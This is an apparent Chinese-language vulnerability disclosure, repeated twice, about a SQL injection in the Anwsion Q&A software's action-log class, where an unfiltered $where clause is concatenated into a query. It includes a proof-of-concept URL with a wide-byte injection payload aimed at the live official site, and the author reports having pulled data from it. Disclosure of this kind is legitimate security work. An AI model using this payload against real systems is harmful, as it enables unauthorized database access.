VULHUB ™

### 简要描述： anwsion注入很普通in注入 ### 详细说明： system/class/cls_action_log_class_inc.php 472代码; public static function get_actions_distint_by_where 类 ``` $sql = "SELECT MAX(history_id) history_id FROM " . get_table('user_action_history') . " WHERE " . $where . " GROUP BY associate_id, associate_type ORDER BY history_id DESC"; ``` $where变量没有过滤。。 用了这个类就遭殃哈哈。。。。 ### 漏洞证明： ``` http://wenda.anwsion.com/people/ajax/user_actions/uid-1__actions-1%df%29%29%27%27%27%27 ``` [<img src="https://images.seebug.org/upload/201211/29182211df3f917abbb00fbb41d616e14459c183.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201211/29182211df3f917abbb00fbb41d616e14459c183.jpg) 注入官方站点数据看看： [<img src="https://images.seebug.org/upload/201211/291836227e200f5e648e379a99f55849db0f6b2e.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201211/291836227e200f5e648e379a99f55849db0f6b2e.png)

### 简要描述： anwsion注入很普通in注入 ### 详细说明： system/class/cls_action_log_class_inc.php 472代码; public static function get_actions_distint_by_where 类 ``` $sql = "SELECT MAX(history_id) history_id FROM " . get_table('user_action_history') . " WHERE " . $where . " GROUP BY associate_id, associate_type ORDER BY history_id DESC"; ``` $where变量没有过滤。。 用了这个类就遭殃哈哈。。。。 ### 漏洞证明： ``` http://wenda.anwsion.com/people/ajax/user_actions/uid-1__actions-1%df%29%29%27%27%27%27 ``` [<img src="https://images.seebug.org/upload/201211/29182211df3f917abbb00fbb41d616e14459c183.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201211/29182211df3f917abbb00fbb41d616e14459c183.jpg) 注入官方站点数据看看： [<img src="https://images.seebug.org/upload/201211/291836227e200f5e648e379a99f55849db0f6b2e.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201211/291836227e200f5e648e379a99f55849db0f6b2e.png)